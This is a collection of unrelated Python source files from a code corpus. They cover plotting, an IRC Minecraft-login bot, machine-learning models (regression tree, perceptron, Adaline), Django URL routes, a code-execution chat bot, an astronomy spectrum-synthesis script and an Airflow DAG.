datasp.plot(kind='line', x='ano', y='sbc', label='São Bernardo do Campo (SP)', ax=ax, color='#FA26A0')
datasp.plot(kind='line', x='ano', y='sjc', label='São José dos Campos (SP)', ax=ax, color='#F51720')
ax.grid(False)
plt.title('Produto Interno Bruto (PIB) \n das 5 maiores cidades do estado de São Paulo', fontsize=14, alpha=0.8)
plt.ylabel('PIB Per Capita em Reais (R$)', fontsize=13, alpha=0.8)
plt.xlabel('Ano', fontsize=13, alpha=0.8)
plt.tick_params(top='off', right='off', labelbottom='on')
plt.show()
|
StarcoderdataPython
|
3229325
|
from qmctorch.utils import (
plot_energy, plot_data, plot_block, plot_walkers_traj)
import matplotlib.pyplot as plt
import numpy as np
print(r" ____ __ ______________ _")
print(r" / __ \ / |/ / ___/_ __/__ ________/ / ")
print(r"/ /_/ / / /|_/ / /__ / / / _ \/ __/ __/ _ \ ")
print(r"\___\_\/_/ /_/\___/ /_/ \___/_/ \__/_//_/ ")
|
StarcoderdataPython
|
3202197
|
<filename>willie/modules/minecraft_logins.py<gh_stars>0
# coding=utf8
"""minecraft_logins.py - Willie module to watch for
users to go online/offline on a minecraft server
Currently gets its data from minecraft dynmap, a bukkit
plugin, but bukkit's future is uncertain, so it won't be
a good source of info for very long.
"""
from __future__ import unicode_literals
import json
from multiprocessing import Process
from willie import web
from willie.module import commands, example, NOLIMIT, interval
def poll_minecraft(bot):
url = bot.config.minecraft.url
try:
minecraft_data = json.loads(web.get(url))
players = [player['name'] for player in minecraft_data['players']]
return players
except Exception as e:
print "Unable to enumerate players: %s" % e
return None
def configure(config):
if config.option('Monitor a minecraft server for logins/logouts?',False):
config.add_section('minecraft')
config.interactive_add('minecraft','url','URL to the Dynmap JSON output (typically http://<minecraft_server>/up/world/world/):','')
config.add_list('minecraft','channels','Channels to display joins/parts to','Channel:')
@interval(15)
def check_for_changed_players(bot):
"""
check to see if any players have joined/left
every 15 seconds
"""
if not (bot.config.has_option('minecraft','url')):
return
if not (bot.config.minecraft.get_list('channels')):
return
channels = bot.config.minecraft.get_list('channels')
players = poll_minecraft(bot)
if players is None:
return
last_onlines = []
try:
last_onlines = bot.memory['last_onlines']
except KeyError:
bot.memory['last_onlines'] = players
last_onlines = players
for pname in players:
if len(pname) > 0:
if pname in last_onlines:
# we've seen this user before
pass
else:
# this user is newly joined
for channel in channels:
bot.msg(channel, "[minecraft] %s joined the server" % pname)
for pname in last_onlines:
if len(pname) > 0:
if pname in players:
# this player is currently online
pass
else:
# this player is no longer online
for channel in channels:
bot.msg(channel, "[minecraft] %s quit the server" % pname)
bot.memory['last_onlines'] = players
@commands('online', 'minecraft')
@example('online - shows which users are logged into the minecraft server')
def who_is_online(bot, trigger):
result = poll_minecraft(bot)
if len(result) == 0:
onlines = "[minecraft] Nobody is currently online."
elif result is None:
onlines = "[minecraft] Couldn't fetch the list of online users. Try again later."
else
onlines = "[minecraft] Players currently online: %s" % ", ".join(result)
bot.say(onlines)
|
StarcoderdataPython
|
1799107
|
<reponame>AbdoulayeDiop/Regression-Tree<gh_stars>0
import numpy as np
from region import Region1, Region2
class Model():
def __init__(self, minSize, eval, norm, alpha):
self.minSize = minSize
self.axis = None
self.subAxis = None
self.root = None
self.eval = eval
self.norm = norm
self.alpha = alpha
def bestSeparation(self, parentRegion):
opt = np.inf
jOpt = None
sOpt = None
for j in range(len(parentRegion.getPopulation()[0])):
svalues = np.sort(parentRegion.getPopulation()[:, j])
maxs = max(svalues)
n = len(svalues)
while n > 0 and svalues[-1] == maxs:
svalues = svalues[:-1]
n -= 1
for s in svalues:
r1 = Region1(self, j, s, elements=parentRegion.getPopulation())
r2 = Region2(self, j, s, elements=parentRegion.getPopulation())
loss = r1.getLoss(r1.value) + r2.getLoss(r2.value)
if loss < opt:
opt = loss
jOpt = j
sOpt = s
if jOpt != None:
r1Opt = Region1(self, jOpt, sOpt, elements=parentRegion.getPopulation())
r2Opt = Region2(self, jOpt, sOpt, elements=parentRegion.getPopulation())
return r1Opt, r2Opt
else:
return None, None
def critereCout(self, t, firstTerm=False):
leaves = t.getLeaves()
s = 0
n = len(leaves)
print("n :", n)
for node in leaves:
s += node.getLoss(node.value)
if not firstTerm:
return s + self.alpha * n
else:
return s
def copy(self, region):
if type(region) == Region1:
r = Region1(self, region.j, region.s, elements=region.getPopulation())
else:
r = Region2(self, region.j, region.s, elements=region.getPopulation())
if not region.is_leaf:
for node in region.children:
newnode = self.copy(node)
newnode.parent = r
return r
def elager(self, t):
tOpt = self.copy(t)
currentTree = self.copy(t)
cOpt = self.critereCout(t)
while not currentTree.is_leaf:
leaves = currentTree.getLeaves()
firstTerm = np.inf
bestIndex = 0
for i in range(0, len(leaves), 2):
p = leaves[i].parent
savechildren = [node for node in p.children]
p.children = []
fs = self.critereCout(currentTree, firstTerm=True)
if fs < firstTerm:
firstTerm = fs
bestIndex = i
p.children = savechildren
leaves[bestIndex].parent.children = []
c = self.critereCout(currentTree)
print("c :", c)
print("cOpt :", cOpt)
if c < cOpt:
print("--------------------------------------------- c :", c)
cOpt = c
tOpt = self.copy(currentTree)
return tOpt
def classify(self, data):
root = Region1(self, 1, np.inf, elements=data)
def divideRecursivelly(region):
if region.getSize() > self.minSize:
print(".................")
r1, r2 = self.bestSeparation(region)
if r1:
r1.parent = region
divideRecursivelly(r1)
r2.parent = region
divideRecursivelly(r2)
divideRecursivelly(root)
root = self.elager(root)
self.root = root
return root
def evaluate(self, elt):
def recEvaluate(region):
if not region.children:
return region
else:
r1, r2 = region.children
if elt[r1.j] <= r1.s:
return recEvaluate(r1)
else:
return recEvaluate(r2)
sol = recEvaluate(self.root)
norm1 = self.norm(elt - sol.value)
norm2 = self.norm(sol.value)
print("region : ", sol, " acc : ", 1 - norm1 / norm2)
return sol
def evaluate2(self, elements):
solList = []
loss = 0
def recEvaluate(elt, region):
if not region.children:
return region
else:
r1, r2 = region.children
if elt[r1.j] <= r1.s:
return recEvaluate(elt, r1)
else:
return recEvaluate(elt, r2)
for elt in elements:
sol = recEvaluate(elt, self.root)
solList.append(sol.value)
loss += self.norm(self.eval(elt) - sol.value)
loss = loss / len(elements)
print("loss : ", loss)
return solList, loss
|
StarcoderdataPython
|
1706908
|
def test_cli_version(cliapp):
from uns import __version__
s, o, e = cliapp()
assert e == ''
assert s == 0
assert o.startswith('usage: uns [-h] [-v]')
s, o, e = cliapp('--version')
assert s == 0
assert o.startswith(__version__)
s, o, e = cliapp('-v')
assert s == 0
assert o.startswith(__version__)
|
StarcoderdataPython
|
79063
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Fri Apr 28 17:57:57 2017
@author: pipolose
"""
from polyML.plot_overlay import plot_n_save_3plane
import matplotlib.pyplot as plt
from matplotlib import cm
in_dict = {}
in_dict['do_save'] = True # True #
in_dict['formats_used'] = ['pdf', 'png']
in_dict['out_dir'] = '/data1/polo/figures'
pv = []
'''
Plot median log degree wilcoxon
'''
in_dict['in_dir'] = ('/data1/polo/code/MLtool/TON_resting_classification/2016_Q4/paper_volumes/TON_Resting_State_bct_degrees_log_norm_mean_happy_sad')
in_dict['in_fn'] = 'bct_degrees_log_PC_0_pmap_FDRmasked.nii.gz'
in_dict['cut_coords'] = [-55, -40, 1]#[20, 3, -5]
in_dict['area'] = 'L-STS'
in_dict['threshold']=0
in_dict['symmetric_cbar'] = True
pv.append(plot_n_save_3plane(in_dict))
'''
Plot mean logistic weights
'''
in_dict['in_dir'] = ('/data1/chdi_results/polo/polyML/results/degree/bct/thres07/non_smooth/happy_sad/PC_0')
in_dict['in_fn'] = 'SAGA_log_elastic_weight_nfolds_51.nii.gz'
in_dict['cut_coords'] = [-55, -40, 1]
in_dict['area'] = 'L-STS'
in_dict['threshold'] = 2.5
in_dict['symmetric_cbar'] = True
pv.append(plot_n_save_3plane(in_dict))
#'''
#Plot mean logistic weights
#'''
#in_dict['in_dir'] = ('/data1/chdi_results/polo/polyML/results/'
# 'degree/bct/thres07/non_smooth/age-sex-corrected')
#in_dict['in_fn'] = 'SAGA_log_elastic_selection_freq_nfolds_153.nii.gz'
#in_dict['cut_coords'] = [18, 3, -2]
#in_dict['area'] = 'pallidum'
#in_dict['threshold'] = .999
#in_dict['symmetric_cbar'] = False
#in_dict['cmap'] = cm.autumn
#pv.append(plot_n_save_3plane(in_dict))
|
StarcoderdataPython
|
3293056
|
<gh_stars>0
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.index, name='index'),
url(r'^recibidos/listar', views.recibidosListar, name='recibidos-listar'),
url(r'^recibidos/facturar', views.recibidosFacturar, name='recibidos-facturar'),
url(r'^gastos/', views.gastos, name='gastos'),
url(r'^factura/(?P<pk>\d+)/', views.factura, name='factura'),
url(r'^print/(?P<pk>\d+)/', views.imprimirFactura, name='print'),
url(r'^imprimir-cierre-mes/(?P<month>\d{2})/(?P<year>\d{4})/', views.imprimirCierreMes, name='imprimir-cierre-mes'),
url(r'^ver-impreso-cierre-mes/(?P<month>\d{2})/(?P<year>\d{4})/', views.verImpresoCierreMes, name='ver-impreso-cierre-mes'),
url(r'^imprimir-cierre-dia/(?P<day>\d{2})/(?P<month>\d{2})/(?P<year>\d{4})/', views.imprimirCierreDia, name='imprimir-cierre-dia'),
url(r'^ver-impreso-cierre-dia/(?P<day>\d{2})/(?P<month>\d{2})/(?P<year>\d{4})/', views.verImpresoCierreDia, name='ver-impreso-cierre-dia'),
url(r'^escoger-cierre', views.escogerCierre, name='escoger-cierre'),
url(r'^cierre-dia-(?P<year>\d{4})-(?P<month>\d{2})-(?P<day>\d{2})', views.cierreDia, name='cierre-dia'),
url(r'^cierres-mes/(?P<month>\d{2})/(?P<year>\d{4})/', views.cierreMes, name='cierre-mes'),
url(r'^recaudo/(?P<pk>\d+)/', views.recaudo, name='recaudo'),
url(r'^imprimir-recaudo/(?P<pk>\d+)/', views.imprimirRecaudo, name='imprimir-recaudo'),
url(r'^ver-impreso-recaudo/(?P<pk>\d+)/', views.verImpresoRecaudo, name='ver-impreso-recaudo'),
url(r'^escoger-recaudo', views.escogerRecaudo, name='escoger-recaudo'),
url(r'^recaudos/listar/$', views.recaudosListar, name='recaudos-listar'),
url(r'^troregis/$', views.registroUsuario, name='registro'),
]
|
StarcoderdataPython
|
1704064
|
<filename>flowtorch/param.py
# Copyright (c) FlowTorch Development Team. All Rights Reserved
# SPDX-License-Identifier: MIT
from typing import Dict, Optional, Sequence, Tuple
import torch
import torch.nn as nn
class ParamsModuleList(torch.nn.Module):
params_modules: nn.ModuleList
def __init__(
self,
params_modules: Sequence["ParamsModule"],
) -> None:
super().__init__()
self.params_modules = nn.ModuleList(params_modules)
def forward(
self, x: torch.Tensor, context: Optional[torch.Tensor] = None
) -> Sequence[Optional[Sequence[torch.Tensor]]]:
return [p.forward(x, context=context) for p in self.params_modules]
def __iter__(self):
return iter(self.params_modules)
def __call__(self):
return self.params_modules
def __len__(self):
return len(self.params_modules)
def __reversed__(self):
return reversed(self.params_modules)
class ParamsModule(torch.nn.Module):
def __init__(
self,
params: "Params",
modules: Optional[nn.ModuleList] = None,
buffers: Optional[Dict[str, torch.Tensor]] = None,
) -> None:
super().__init__()
self.params = params
self.mods = modules
if buffers is not None:
for n, v in buffers.items():
self.register_buffer(n, v)
def forward(
self, x: torch.Tensor, context: Optional[torch.Tensor] = None
) -> Optional[Sequence[torch.Tensor]]:
return self.params.forward(x, modules=self.mods, context=context)
class Params(object):
"""
Deferred initialization of parameters.
"""
def __init__(self) -> None:
super().__init__()
def __call__(
self,
input_shape: torch.Size,
param_shapes: Sequence[torch.Size],
context_dims: int,
) -> ParamsModule:
return ParamsModule(self, *self.build(input_shape, param_shapes, context_dims))
def forward(
self,
x: torch.Tensor,
context: Optional[torch.Tensor] = None,
modules: Optional[nn.ModuleList] = None,
) -> Optional[Sequence[torch.Tensor]]:
if context is None:
context = torch.empty(0)
if modules is None:
modules = nn.ModuleList()
return self._forward(x, context=context, modules=modules)
def _forward(
self,
x: torch.Tensor,
context: torch.Tensor,
modules: nn.ModuleList,
) -> Sequence[torch.Tensor]:
"""
Abstract method to ***
"""
raise NotImplementedError
def build(
self,
input_shape: torch.Size,
param_shapes: Sequence[torch.Size],
context_dims: int,
) -> Tuple[nn.ModuleList, Dict[str, torch.Tensor]]:
self.input_shape = input_shape
self.param_shapes = param_shapes
return self._build(input_shape, param_shapes, context_dims)
def _build(
self,
input_shape: torch.Size,
param_shapes: Sequence[torch.Size],
context_dims: int,
) -> Tuple[nn.ModuleList, Dict[str, torch.Tensor]]:
"""
Abstract method to ***
"""
raise NotImplementedError
|
StarcoderdataPython
|
3375239
|
<gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
import zlib
from literate_banana import Bot
LANGUAGES = {
'c': 'c-gcc',
'c#': 'cs-core',
'c++': 'cpp-gcc',
'common lisp': 'clisp',
'groovy': 'groovy',
'go': 'go',
'haskell': 'haskell',
'java': 'java-openjdk9',
'java 8': 'java-openjdk',
'java 9': 'java-openjdk9',
'javascript': 'javascript-node',
'kotlin': 'kotlin',
'lisp': 'clisp',
'mathematica': 'mathematica',
'perl': 'perl6',
'perl 5': 'perl5',
'perl 6': 'perl6',
'php': 'php',
'python': 'python3',
'python 2': 'python2',
'python 3': 'python3',
'ruby': 'ruby',
'rust': 'rust'
}
LANGLIST = [
'C',
'C#',
'C++',
'Common Lisp',
'Groovy',
'Go',
'Haskell',
'Java 8',
'Java 9',
'JavaScript',
'Kotlin',
'Mathematica',
'Perl 5',
'Perl 6',
'PHP',
'Python 2',
'Python 3',
'Ruby',
'Rust'
]
def execute(match, trigger):
try:
req = bytes('Vlang\x001\x00{}\x00F.code.tio\x00{}\x00{}R'.format(
LANGUAGES[match[1].lower()], len(match[2]), match[2]), 'utf-8')
except KeyError:
return 'Language {} not found. See !languages for a list of languages I support.'.format(match[0])
req = zlib.compress(req)[2:-4]
res = requests.post('https://tio.run/cgi-bin/run/api/', req).text
res = res.split(res[:16])[1:]
if match[0]:
return ['Output:\n' + res[0], 'Debug:\n' + '\n'.join(res[1].splitlines()[:-6])]
return 'Output:\n' + res[0]
def list_languages(match, trigger):
return ', '.join(LANGLIST)
def search_languages(match, trigger):
matches = [i for i in LANGLIST if match[0].lower() in i.lower()]
if matches:
return ', '.join(matches)
else:
return 'No languages matching {}. See !languages for a list of languages I support.'.format(match[0])
TIOBot = Bot(
nick = 'TIOBot',
room = 'xkcd',
short_help = 'I allow easy execution of code online!',
long_help = ('I allow easy execution of code online!\n'
'\n'
'Commands:\n'
' !execute [-d|--debug] <language> -- <code> -> The STDOUT (and STDERR if the debug flag is enabled) output after'
' execution of <code> in <language>.\n'
' !languages -> List of languages that I support.\n'
'\n'
'by totallyhuman\n'
'My source code is here: https://github.com/totallyhuman/TIOBot'
),
generic_ping = 'Pong!',
specific_ping = 'Pong!',
regexes = {
r'(?i)^\s*!execute(\s+(?:-d|--debug))?\s+(.+?)\s*--\s*([\s\S]+?)\s*$': execute,
r'(?i)^\s*!languages\s*$': list_languages,
r'(?i)^\s*!languages\s+(.+?)\s*$': search_languages
}
)
while True:
TIOBot.receive()
|
StarcoderdataPython
|
56283
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# author arrti
from ss_admin import app
if __name__ == '__main__':
app.run()
|
StarcoderdataPython
|
4817957
|
from django.db import models
from accounts.models import CustomUser
import datetime
class Schedule(models.Model):
summary = models.CharField("タイトル ※必須", max_length=25)
date = models.DateField("日付 ※必須")
place = models.CharField("場所", max_length=20, blank=True)
time = models.TimeField("時間", blank=True, null=True)
detail = models.TextField("詳細", blank=True)
owner = models.ForeignKey(CustomUser, on_delete=models.CASCADE, related_name="Schedule_owner")
|
StarcoderdataPython
|
119462
|
"""
Implements the Perception & Adaline Learning Algorithm
Author: <NAME>
Created: May 18, 2010
"""
import numpy as np
import matplotlib.pyplot as plt
class Perception:
"""first artifical neural classifier
Args:
eta: Learning rate (between 0.0 and 1.0)
n_iter: passees over the training set
random_state: Random Number Generator seed
for random weight initilization
Attributes:
w: Weights after fitting
errors: Number of misclassifications(updates) in each epoch
"""
def __init__(self, eta: float = 0.01, n_iter: int = 50, random_state: int = 1):
self.eta = eta
self.n_iter = n_iter
self.random_state = random_state
def fit(self, X: np.ndarray, y: np.ndarray) -> 'Perception':
"""fits training data
Args:
X: shape = {n_samples, p_features}
n_samples is number of instances i.e rows
p_features is number of features (the dimension of dataset)
y: shape = {n_samples, 1}
Target values
Returns:
object
"""
# random number gen seed to reproduce values if needed
rgen = np.random.RandomState(self.random_state)
# initialize weights from normal distribution
self.w = rgen.normal(loc=0.0, scale=0.01, size=1+X.shape[1])
self.errors = []
for _ in range(self.n_iter):
errors = 0
# for each instance in training set
for xi, target in zip(X, y):
# calculate the weight update by perception rule
delta_wj = self.eta * (target - self.predict(xi))
# update all weights simultaneously
# given by wj := wj + delta_wj
self.w[1:] += + delta_wj * xi
# since x0 = 1 by construction
self.w[0] += delta_wj
# calculate number of misclassifications
errors += int(delta_wj != 0)
self.errors.append(errors)
return self
def net_input(self, X: np.ndarray) -> np.ndarray:
"""computes the net input vector
z = w1x1 + w2x2 + ... + wpXp
Args:
X: shape = {n_samples, p_features}
n_samples is # of instances
p_features is number of features (dimension of dataset)
Returns:
z: shape = {n_samples, 1}
net input vector
"""
return np.dot(X, self.w[1:]) + self.w[0]
def predict(self, X: np.ndarray) -> float:
"""
computes the classifier phi(z)
where phi(z) = 1 if z:= w'x >=0, -1 otherwise
Args:
X: shape {n_samples, p_features}
Returns:
classifier with value +1 or -1
"""
return np.where(self.net_input(X) > 0, 1, -1)
def plot_misclassifications(self) -> None:
"""plots the misclassifications given the number of epoochs
requires to call the fit() first
"""
try:
plt.plot(range(1, self.n_iter + 1), self.errors, marker='o');
plt.xlabel("epoch")
plt.ylabel("# of misclassifications")
except AttributeError as e:
print("must call fit() first before plotting misclassifications")
else:
return
class AdalineGD:
"""artificial neural classifier
implemented with gradient descent
Args:
eta: Learning rate (between 0.0 and 1.0)
n_iter: passees over the training set
random_state: Random Number Generator seed
for random weight initilization
Attributes:
w: Weights after fitting
errors: Number of misclassifications(updates) in each epoch
"""
def __init__(self, eta: float = 0.01, n_iter: int = 50, random_state: int = 1):
self.eta = eta
self.n_iter = n_iter
self.random_state = random_state
def fit(self, X: np.ndarray, y: np.ndarray) -> 'AdalineGD':
"""fits training data
Args:
X: shape = {n_samples, p_features}
n_samples is number of instances i.e rows
p_features is number of features (the dimension of dataset)
y: shape = {n_samples, 1}
Target values
Returns:
object
"""
# random number gen seed to reproduce values if needed
rgen = np.random.RandomState(self.random_state)
# initialize weights from normal distribution
self.w = rgen.normal(loc=0.0, scale=0.01, size=1+X.shape[1])
self.cost = []
for _ in range(self.n_iter):
# calculate net input
net_input = self.net_input(X)
# calculate the linear activation function phi(z) = w'x = z
output = self.activation(net_input)
errors = y - output
# update the weights
self.w[1:] += eta * X.T.dot(errors)
self.w[0] += eta * errors.sum()
# sse based on J(w) = 1/2 sum(yi - yhat)**2
cost = (errors**2).sum() / 2.0
self.cost.append(cost)
return self
def net_input(self, X: np.ndarray) -> np.ndarray:
"""computes the net input vector
z = w1x1 + w2x2 + ... + wpXp
Args:
X: shape = {n_samples, p_features}
n_samples is # of instances
p_features is number of features (dimension of dataset)
Returns:
z: shape = {n_samples, 1}
net input vector
"""
return np.dot(X, self.w[1:]) + self.w[0]
def activation(self, X: np.ndarray) -> np.ndarray:
"""compute linear activation z = w'x = phi(z)
Args:
X: shape = {n_samples, n_features}
Returns:
the input by itself
"""
return X
def predict(self, X: np.ndarray) -> float:
"""
computes the classifier phi(z)
where phi(z) = 1 if z:= w'x >=0, -1 otherwise
Args:
X: shape {n_samples, p_features}
Returns:
classifier with value +1 or -1
"""
return np.where(self.activation(self.net_input(X)) > 0, 1, -1)
|
StarcoderdataPython
|
3289845
|
<reponame>StardustDL/Game.GoldenNumber
def adjustNumberInRange(x: float) -> float:
"""Adjust number into range (0,100)"""
if x <= 0:
return 1e-12
if x >= 100:
return 100 - 1e-12
return x
|
StarcoderdataPython
|
120032
|
from __future__ import division
from datetime import timedelta, datetime, tzinfo
if not hasattr(timedelta, 'total_seconds'):
def total_seconds(td):
"Return the total number of seconds contained in the duration for Python 2.6 and under."
return (td.microseconds + (td.seconds + td.days * 86400) * 1e6) / 1e6
else:
total_seconds = timedelta.total_seconds
# Timezone related stuff
# (mostly copied from https://github.com/django/django/blob/master/django/utils/timezone.py)
try:
from django.utils.timezone import now, get_current_timezone
except ImportError:
now = datetime.now
get_current_timezone = lambda: None
|
StarcoderdataPython
|
74975
|
#Execution-3
from fake_news_detection_final_code import *
# main function.
def main():
Training_Validating('fake_news_dataset',130000,400,100,12,64,'x_test_3','y_test_3','history_3','model_3')
Testing('x_test_3','y_test_3','history_3','model_3')
#############################################
# utility function of main.
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
87258
|
<reponame>icryrainix/odil<filename>tests/wrappers/webservices/test_message.py
import unittest
import odil
class TestMessage(unittest.TestCase):
def test_default_constructor(self):
message = odil.webservices.Message()
self.assertEqual(dict(message.get_headers()), {})
self.assertEqual(message.get_body(), "")
def test_full_constructor(self):
message = odil.webservices.Message(headers={"foo": "bar"}, body="body")
self.assertEqual(dict(message.get_headers()), {"foo": "bar"})
self.assertEqual(message.get_body(), "body")
def test_existing_header(self):
message = odil.webservices.Message({"foo": "bar", "plip": "plop"})
self.assertTrue(message.has_header("foo"))
self.assertEqual(message.get_header("foo"), "bar")
def test_missing_header(self):
message = odil.webservices.Message({"foo": "bar", "plip": "plop"})
self.assertFalse(message.has_header("none"))
with self.assertRaises(odil.Exception):
message.get_header("none")
def test_set_headers(self):
message = odil.webservices.Message()
message.set_headers({"foo": "bar", "plip": "plop"})
self.assertEqual(
dict(message.get_headers()), {"foo": "bar", "plip": "plop"})
def test_modify_header(self):
message = odil.webservices.Message({"foo": "bar", "plip": "plop"})
message.set_header("foo", "baz")
self.assertEqual(message.get_header("foo"), "baz")
def test_add_header(self):
message = odil.webservices.Message()
message.set_header("foo", "baz")
self.assertEqual(message.get_header("foo"), "baz")
def test_body(self):
message = odil.webservices.Message()
message.set_body("body")
self.assertEqual(message.get_body(), "body")
if __name__ == "__main__":
unittest.main()
|
StarcoderdataPython
|
3345423
|
# Copyright 2020 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tools and methods for quantum information science."""
from cirq.qis.channels import (
kraus_to_channel_matrix,
kraus_to_choi,
operation_to_channel_matrix,
operation_to_choi,
)
from cirq.qis.clifford_tableau import CliffordTableau
from cirq.qis.measures import (
fidelity,
von_neumann_entropy,
)
from cirq.qis.states import (
bloch_vector_from_state_vector,
density_matrix,
density_matrix_from_state_vector,
dirac_notation,
eye_tensor,
infer_qid_shape,
one_hot,
QUANTUM_STATE_LIKE,
QuantumState,
quantum_state,
STATE_VECTOR_LIKE,
to_valid_density_matrix,
to_valid_state_vector,
validate_density_matrix,
validate_indices,
validate_qid_shape,
validate_normalized_state_vector,
)
|
StarcoderdataPython
|
136273
|
<filename>actingweb/__init__.py
__all__ = ["actor", "oauth", "auth", "property", "trust", "config"]
|
StarcoderdataPython
|
3305884
|
<reponame>cclauss/4most-4gp-scripts<gh_stars>0
#!../../../../virtualenv/bin/python3
# -*- coding: utf-8 -*-
# NB: The shebang line above assumes you've installed a python virtual environment alongside your working copy of the
# <4most-4gp-scripts> git repository. It also only works if you invoke this python script from the directory where it
# is located. If these two assumptions are incorrect (e.g. you're using Conda), you can still use this script by typing
# <python synthesize_ges_dwarfs.py>, but <./synthesize_ges_dwarfs.py> will not work.
"""
Take stellar parameters of GES dwarf stars and synthesize spectra using TurboSpectrum.
"""
import json
import logging
import numpy as np
from astropy.io import fits
from lib.base_synthesizer import Synthesizer
# List of elements whose abundances we pass to TurboSpectrum
# Elements with neutral abundances, e.g. LI1
element_list = (
"He", "Li", "C", "O", "Ne", "Na", "Mg", "Al", "Si", "S", "Ca", "Sc", "Ti", "V", "Cr", "Mn", "Co", "Ni", "Cu", "Zn",
"Sr", "Y", "Zr", "Nb", "Mo", "Ru")
# Elements with ionised abundances, e.g. N2
element_list_ionised = ("N", "Ba", "La", "Ce", "Pr", "Nd", "Sm", "Eu", "Gd", "Dy")
# Start logging our progress
logging.basicConfig(level=logging.INFO, format='[%(asctime)s] %(levelname)s:%(filename)s:%(message)s',
datefmt='%d/%m/%Y %H:%M:%S')
logger = logging.getLogger(__name__)
logger.info("Synthesizing GES dwarf spectra")
# Instantiate base synthesizer
synthesizer = Synthesizer(library_name="ges_dwarf_sample",
logger=logger,
docstring=__doc__)
# Table supplies list of abundances for GES stars
f = fits.open("../../downloads/GES_iDR5_WG15_Recommended.fits")
ges = f[1].data
ges_fields = ges.names
# Obtain solar abundances, needed to convert values in file into solar units
sun_id = np.where(ges.OBJECT == 'Sun_Benchmarks_BordeauxLib3 ')[0]
# Filter objects on SNR
min_SNR = 50
selection = np.where((ges.SNR > min_SNR) & (ges.REC_WG == 'WG11') & (ges.LOGG > 3.5))[0]
stellar_data = ges[selection]
# Loop over stars extracting stellar parameters from FITS file
star_list = []
for star_index in range(len(stellar_data)):
star_list_item = {
"name": stellar_data.CNAME[star_index],
"Teff": float(stellar_data.TEFF[star_index]),
"[Fe/H]": float(stellar_data.FEH[star_index]),
"logg": float(stellar_data.LOGG[star_index]),
"extra_metadata": {
"[alpha/Fe]": float(stellar_data.ALPHA_FE[star_index])
},
"free_abundances": {},
"input_data": {}
}
# Pass list of the abundances of individual elements to TurboSpectrum
free_abundances = star_list_item["free_abundances"]
for elements, ionisation_state in ((element_list, 1), (element_list_ionised, 2)):
for element in elements:
if (not synthesizer.args.elements) or (element in synthesizer.args.elements.split(",")):
fits_field_name = "{}{}".format(element.upper(), ionisation_state)
# Normalise abundance of element to solar
abundance = stellar_data[fits_field_name][star_index] - ges[fits_field_name][sun_id]
if np.isfinite(abundance):
free_abundances[element] = float(abundance)
# Propagate all ionisation states into metadata
metadata = star_list_item["extra_metadata"]
for element in element_list:
abundances_all = []
for ionisation_state in range(1, 5):
fits_field_name = "{}{}".format(element.upper(), ionisation_state)
if fits_field_name in ges_fields:
abundance = stellar_data[fits_field_name][star_index] - ges[fits_field_name][sun_id]
abundances_all.append(float(abundance))
else:
abundances_all.append(None)
metadata["[{}/H]_ionised_states".format(element)] = json.dumps(abundances_all)
# Propagate all input fields from the FITS file into <input_data>
input_data = star_list_item["input_data"]
for col_name in ges_fields:
if col_name == "CNAME":
continue
value = stellar_data[col_name][star_index]
if ges.dtype[col_name].type is np.string_:
typed_value = str(value)
else:
typed_value = float(value)
input_data[col_name] = typed_value
star_list.append(star_list_item)
# Pass list of stars to synthesizer
synthesizer.set_star_list(star_list)
# Output data into sqlite3 db
synthesizer.dump_stellar_parameters_to_sqlite()
# Create new SpectrumLibrary
synthesizer.create_spectrum_library()
# Iterate over the spectra we're supposed to be synthesizing
synthesizer.do_synthesis()
# Close TurboSpectrum synthesizer instance
synthesizer.clean_up()
|
StarcoderdataPython
|
1766244
|
#crie um programa que leia quanto dinheiro uma pessoa tem na carteira e mostre quantos dolares ela pode comprar.$=3,27
Real = float(input('Quanto dinheiro você tem na carteira? R$'))
Dolar = Real/3.27
print(f'Com R${Real:.2f} você pode comprar US${Dolar:.2f}')
|
StarcoderdataPython
|
136516
|
<gh_stars>0
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from airflow.operators.python_operator import PythonOperator
from datetime import datetime, timedelta
default_args = {
'owner': 'airflow',
'description': 'Wikipedia assistant',
'depends_on_past': False,
'start_date': datetime(2020, 7, 28),
'email': ['<EMAIL>'],
'email_on_failure': False,
'email_on_retry': False,
'retries': 1,
'retry_delay': timedelta(minutes=5)
}
dag = DAG(
'Wiki_Analyzer',
default_args=default_args,
schedule_interval=timedelta(days=20))
def validate_connections():
print("Connections validation code goes here")
validate_connectivity = PythonOperator(
task_id='validate_connectivity',
provide_context=True,
python_callable=validate_connections,
dag=dag,
)
extract_wiki_data = BashOperator(
task_id='extract_wiki_data',
bash_command='docker run --network=host -v $(pwd):/job godatadriven/pyspark --name "Wiki Extractor" --master "local[1]" --conf "spark.ui.showConsoleProgress=True" --jars /job/libs/* --conf spark.cassandra.connection.host=localhost /job/code/spark_reader_server.py',
dag=dag,
)
validate_connectivity >> extract_wiki_data
|
StarcoderdataPython
|
4810811
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-09-12 03:42
from __future__ import unicode_literals
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('swot_item', '0003_auto_20170912_0321'),
]
operations = [
migrations.CreateModel(
name='UpVote',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
],
),
migrations.RenameModel(
old_name='SwotItem',
new_name='Item',
),
migrations.AddField(
model_name='upvote',
name='item',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='swot_item.Item'),
),
]
|
StarcoderdataPython
|
73989
|
<reponame>matheusmiguelsa/Exerc-cios-de-Python<gh_stars>0
v = float(input('Valor da casa a ser comprada: R$'))
s = float(input('Salário do comprador: R$'))
qa = float(input('Quantos anos irá pagar: '))
print('Para pagar uma casa de R${:.2f} em {:.0f} anos'.format(v, qa), end='')
print(' a prestação sera de R${:.2f}'.format(v / (qa * 12)))
